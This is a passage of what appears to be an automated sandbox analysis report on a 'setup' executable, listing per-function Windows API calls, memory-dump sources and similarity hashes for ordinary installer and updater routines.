• GetClientRect.USER32(?,?), ref: 00C30B2D
  • Part of subcall function 00C2E48B: __EH_prolog3.LIBCMT ref: 00C2E492
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: MessageRectSend$ClientH_prolog3$AdjustCaptureMenuWindow
• String ID:
• API String ID: 2126229686-0
• Opcode ID: 598b457b2e33bf141b7af0148afc56f5d188d399585a81cada48ecab37a38f8a
• Instruction ID: 646965871f67e0b18a744c42044c1b3d4238f759c6b1a036c221e0265b8ea8a5
• Opcode Fuzzy Hash: 598b457b2e33bf141b7af0148afc56f5d188d399585a81cada48ecab37a38f8a
• Instruction Fuzzy Hash: 26419372A10209AFDF14EBA4CD59FBEBBB9EF54314F144159F904A7292DB309E40DB90
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C23153
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00C2315B
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00C23163
                                                                                                                            • Part of subcall function 00C230FA: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00C2316B
                                                                                                                            • Part of subcall function 00C230FA: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00C23176
                                                                                                                          • GetParent.USER32(?), ref: 00C231A6
                                                                                                                          • SendMessageW.USER32(?,00000464,00000001,?), ref: 00C231D0
                                                                                                                          • SendMessageW.USER32(?,00000466,00000001,?), ref: 00C231E1
                                                                                                                          • SendMessageW.USER32(?,00000464,?,00000000), ref: 00C23238
                                                                                                                          • SendMessageW.USER32(?,00000466,?,00000000), ref: 00C23271
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ConditionMaskMessageSend$InfoParentVerifyVersion
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3342151426-0
                                                                                                                          • Opcode ID: cf97884ae77a21f5016e044d424cffa1034875b53f97858c9b662fe136a3b39d
                                                                                                                          • Instruction ID: 5270535f8c291eaf73933ccd751e85788827301d61e45ffac1ad54941086b2be
                                                                                                                          • Opcode Fuzzy Hash: cf97884ae77a21f5016e044d424cffa1034875b53f97858c9b662fe136a3b39d
                                                                                                                          • Instruction Fuzzy Hash: 0D31B5B1900310AEDB14ABB4EC86F7E77ADAB44710F20401DF655D61C1EA74EA019A18
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C254CF
                                                                                                                            • Part of subcall function 00C2CFF3: __EH_prolog3.LIBCMT ref: 00C2CFFA
                                                                                                                            • Part of subcall function 00C2CFF3: BeginPaint.USER32(?,?,00000004,00C389E0,?,00000058,00C1C274), ref: 00C2D026
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C2550B
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00C25514
                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C25537
                                                                                                                            • Part of subcall function 00C2D7E9: SelectObject.GDI32(?,?), ref: 00C2D7F2
                                                                                                                          • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00C255B6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CompatibleCreate$BeginBitmapClientH_prolog3H_prolog3_ObjectPaintRectSelect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1536692648-0
                                                                                                                          • Opcode ID: 44f6fdbd8bf86419ac0a09875a395dce35a9c6c51be1b2c0eb4b2e79e20f7671
                                                                                                                          • Instruction ID: 859610175551c3885dc985ad4df2660e69ae669c8f2c18831457f9069ca72419
                                                                                                                          • Opcode Fuzzy Hash: 44f6fdbd8bf86419ac0a09875a395dce35a9c6c51be1b2c0eb4b2e79e20f7671
                                                                                                                          • Instruction Fuzzy Hash: 4441E4719001299FDF15EFA4DC89AEEBB79FF19300F108199B806A7152DB316E44DF60
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F33
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F60
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,?,?,?,74DEFFC0,00000000), ref: 00C01F77
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,74DEFFC0,00000000), ref: 00C01F90
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C01FBB
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00C01FC6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FreeGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3862222148-0
                                                                                                                          • Opcode ID: a0d997d1c0da188b32e9931cdb54761ead487fdf6ba75a717bbb1f9513780b7c
                                                                                                                          • Instruction ID: 593eeefd61ebe5324404e794cb18488f15e3031805fb7cc4a0138d6ec5a1da23
                                                                                                                          • Opcode Fuzzy Hash: a0d997d1c0da188b32e9931cdb54761ead487fdf6ba75a717bbb1f9513780b7c
                                                                                                                          • Instruction Fuzzy Hash: 71314D74A00206EFDB14DFA5CC59FAEBBF8FF08304F148469E956A71A0D771AA44DB50
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C1C288: UpdateWindow.USER32(?), ref: 00C1C2FA
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C836
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C84E
                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 00C1C860
                                                                                                                          Strings
                                                                                                                          • No update of %s available., xrefs: 00C1C87B
                                                                                                                          • Version information received., xrefs: 00C1C7B3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep$UpdateWindow
                                                                                                                          • String ID: No update of %s available.$Version information received.
                                                                                                                          • API String ID: 1371002805-3891218378
                                                                                                                          • Opcode ID: da02d6da72d321c3b33248392ec87cef7eaea5c68422ad9c3a6b5ff232611576
                                                                                                                          • Instruction ID: f4ebe4ed9e65c03e172f957714064b61a9fac88de1eeec149f4bde83ca6de9a2
                                                                                                                          • Opcode Fuzzy Hash: da02d6da72d321c3b33248392ec87cef7eaea5c68422ad9c3a6b5ff232611576
                                                                                                                          • Instruction Fuzzy Hash: 38213871B80211ABEB19A3A08CC2BFD7359AF83710F140229F425671D1DBA05D91BAD1
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C26901
                                                                                                                          • lstrlenW.KERNEL32(?,00000024,00C186ED,?,00000000,00000000,00000000,00000000,000000AC), ref: 00C2693B
                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 00C2695E
                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00C2698B
                                                                                                                          • lstrlenA.KERNEL32(00000007,00000007), ref: 00C2699E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$H_prolog3_
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065084494-0
                                                                                                                          • Opcode ID: 4edd75bb7bb3291375ef0d3b955f9b69aea978b60de79c615a4d3ce5a85527c4
                                                                                                                          • Instruction ID: 2a01c1bc10ce6531745edf569177f89f76694b421c6a25b0d4feebbb4523ddd8
                                                                                                                          • Opcode Fuzzy Hash: 4edd75bb7bb3291375ef0d3b955f9b69aea978b60de79c615a4d3ce5a85527c4
                                                                                                                          • Instruction Fuzzy Hash: 90219171A042649FDB24BFA9E85A5ADB6B8FB48314B00452AF462A7680DE309941DB71
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 00C253F6
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00C2540C
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C2543A
                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00C25446
                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00C25470
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientScreenWindow$MoveParentRect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3734752182-0
                                                                                                                          • Opcode ID: 8d674b9dabbfe40115eb9c4b6735827e1ce43972377cd747b087a90f98a086b9
                                                                                                                          • Instruction ID: 6e5264cf86bac44c1696b6f83b9266f7200e48741f7f6a6055f8b1207aa89f65
                                                                                                                          • Opcode Fuzzy Hash: 8d674b9dabbfe40115eb9c4b6735827e1ce43972377cd747b087a90f98a086b9
                                                                                                                          • Instruction Fuzzy Hash: 5F31FAB1E00219AFCB00DFA9D984AAEFBF9FF48314B118156E955E3651D734AE40CFA0
                                                                                                                          APIs
                                                                                                                          • RegDeleteKeyW.ADVAPI32(00000000,?), ref: 00C3B188
                                                                                                                          • RegDeleteValueW.ADVAPI32(00000000,?,?,00000000), ref: 00C3B1A8
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00C3B1D9
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC2A
                                                                                                                            • Part of subcall function 00C3AB85: RegCloseKey.ADVAPI32(00000000), ref: 00C3AC39
                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000001,?,00000000,?,00000000), ref: 00C3B1D0
                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00C3B1F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                           • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                           • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$DeleteValue$PrivateProfileStringWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 222425065-0
                                                                                                                          • Opcode ID: 1c4edbb7ad96c0b76ec4b58b2fe16d907072ceb3670a671121b8fa094c2a0c08
                                                                                                                          • Instruction ID: cf499593f4970fb0742b87f62de52c0683f97fe9a58ceeba7c08a5193eb305a1
                                                                                                                          • Opcode Fuzzy Hash: 1c4edbb7ad96c0b76ec4b58b2fe16d907072ceb3670a671121b8fa094c2a0c08
                                                                                                                          • Instruction Fuzzy Hash: E411AC33520616BBCB225F619C98FAF7B6AAF487A0F114025FA169A160DB31CE10D7E0
APIs
• __EH_prolog3.LIBCMT ref: 00C1258D
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C125B6
• DragQueryFileW.SHELL32(?,00000000,00000000,00000000), ref: 00C125C2
• DragQueryFileW.SHELL32(?,00000000,00000000,00000004), ref: 00C125E0
• DragFinish.SHELL32(?), ref: 00C125F4
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Drag$FileQuery$FinishH_prolog3
• String ID:
• API String ID: 624144372-0
• Opcode ID: 542427611f2aa29ac1146fbbf24749b76fb6a4de491e64d1a3c2a8858cf83a00
• Instruction ID: 5964b806548031ea31153cb2397a5c34b78957c64cf9dd961b9744697a457618
• Opcode Fuzzy Hash: 542427611f2aa29ac1146fbbf24749b76fb6a4de491e64d1a3c2a8858cf83a00
• Instruction Fuzzy Hash: 3311A0B1800116AFEB18ABA4DD59EBF77ACFF45310B054629B812A71C1DE70AE04EB60
APIs
• __EH_prolog3.LIBCMT ref: 00C121C2
• GetCurrentThreadId.KERNEL32 ref: 00C121F5
• EnterCriticalSection.KERNEL32 ref: 00C12243
• LeaveCriticalSection.KERNEL32(?,?), ref: 00C12260
• PostMessageW.USER32(00000000,00000000,00000000), ref: 00C12276
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CriticalSection$CurrentEnterH_prolog3LeaveMessagePostThread
• String ID:
• API String ID: 73856410-0
• Opcode ID: 4b15f5545374f049b180bef19a72d64f1930037b2d7b5072676961491c3f8720
• Instruction ID: 0bfa19d5997fa8ce515ee58f265c9b7d63d5d10f9c55956aedda4788e60817c2
• Opcode Fuzzy Hash: 4b15f5545374f049b180bef19a72d64f1930037b2d7b5072676961491c3f8720
• Instruction Fuzzy Hash: 1B219A74900206FBDF159F60CC49BEDBBB0FB16314F04411AF5195A2A1CB749AA5EB91
APIs
• VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 00C23153
• VerSetConditionMask.KERNEL32(00000000,?,00000001,00000003), ref: 00C2315B
• VerSetConditionMask.KERNEL32(00000000,?,00000020,00000003), ref: 00C23163
• VerSetConditionMask.KERNEL32(00000000,?,00000010,00000003), ref: 00C2316B
• VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 00C23176
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: ConditionMask$InfoVerifyVersion
• String ID:
• API String ID: 2793162063-0
• Opcode ID: a8cf220b814c66bd4841fe9ac139a0d8c40ae62716a177096facf478d42a4413
• Instruction ID: 19d453b3f5eb8889cb162c461b3f531db2dfd6f754ff05a0885abc18bb677981
• Opcode Fuzzy Hash: a8cf220b814c66bd4841fe9ac139a0d8c40ae62716a177096facf478d42a4413
• Instruction Fuzzy Hash: 600179B09543147AE6309B74EC4AFAB7ADCDB88B10F00491AB648D71C0D6B495148BE5
APIs
• DestroyCaret.USER32 ref: 00C10574
• GetObjectW.GDI32(?,0000005C,?), ref: 00C10596
• CreateCaret.USER32(?,00000000,00000001,00000002), ref: 00C105CB
• ShowCaret.USER32(?), ref: 00C105D4
• HideCaret.USER32(?), ref: 00C105DF
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: Caret$CreateDestroyHideObjectShow
• String ID:
• API String ID: 4023528183-0
• Opcode ID: a73f0ce482d8b85d9284502c0c60b1ac88c3b28365e6ff45db20952c4755b789
• Instruction ID: 06da33b483e0eaaaa65287547861f531caf2aeaa673a3f5b3d5e99d736c8118c
• Opcode Fuzzy Hash: a73f0ce482d8b85d9284502c0c60b1ac88c3b28365e6ff45db20952c4755b789
• Instruction Fuzzy Hash: 46016131600709AFDB25AB74DC0DFAEB7B6BB08700F114529F5469A1E0EBB1A944DF44
APIs
• DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8C5
• GetLastError.KERNEL32(?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF,?,00C165B2), ref: 00C2C8CF
• GetFileAttributesW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8E2
• SetFileAttributesW.KERNEL32(00000000,00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8F9
• DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C90B
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File$AttributesDelete$ErrorLast
• String ID:
• API String ID: 790777564-0
• Opcode ID: 6570e03446f78060120cb34fde9fb386e7130ab12d059e34587ac6395373d028
• Instruction ID: bc8a454a209cbdcb934d01e35cf11acb4ebdab8a795736a72ef37322da0c255d
• Opcode Fuzzy Hash: 6570e03446f78060120cb34fde9fb386e7130ab12d059e34587ac6395373d028
• Instruction Fuzzy Hash: ABF03070600972A38A2437797D8E7AE375D5E223A13150615F036E38E1CFA4CAC5A668
APIs
• EnterCriticalSection.KERNEL32(00CC3BA0,?,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F2E6
• InitializeCriticalSection.KERNEL32(00000000,?,00C2F254,00000001), ref: 00C3F2FC
• LeaveCriticalSection.KERNEL32(00CC3BA0,?,00C2F254,00000001), ref: 00C3F30A
• EnterCriticalSection.KERNEL32(00000000,MultiDataViewCtrl,?,?,00C2F254,00000001), ref: 00C3F317
  • Part of subcall function 00C3F24C: InitializeCriticalSection.KERNEL32(00CC3BA0,00C3F2CF,?,?,00C2F254,00000001), ref: 00C3F264
Strings
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: CriticalSection$EnterInitialize$Leave
• String ID: MultiDataViewCtrl
• API String ID: 713024617-1429961936
• Opcode ID: 8ea471ad643c97af660477080698b10cf11dafdbce817c767d86e95152410654
• Instruction ID: 43bd41049e1c76a791271ef81ed95a888d246979dfc0fb4997867aa97f6f6ec0
• Opcode Fuzzy Hash: 8ea471ad643c97af660477080698b10cf11dafdbce817c767d86e95152410654
• Instruction Fuzzy Hash: ADF06272900158ABCB403B98FC5CF7D776CFB52325F44447EE446D2162C735CE4689A5
APIs
• _strlen.LIBCMT ref: 00C17ECA
  • Part of subcall function 00C2C8AF: DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8C5
  • Part of subcall function 00C2C8AF: GetLastError.KERNEL32(?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF,?,00C165B2), ref: 00C2C8CF
  • Part of subcall function 00C2C8AF: GetFileAttributesW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8E2
  • Part of subcall function 00C2C8AF: SetFileAttributesW.KERNEL32(00000000,00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C8F9
  • Part of subcall function 00C2C8AF: DeleteFileW.KERNEL32(00000000,?,00C23EDC,?,?,*.*,00004014,?,?,4641B5ED,?,?,00000000,00C93FF6,000000FF), ref: 00C2C90B
Strings
• Deleting file : "%s", xrefs: 00C1806F
• FAILED to deleting file : "%s", xrefs: 00C1807F
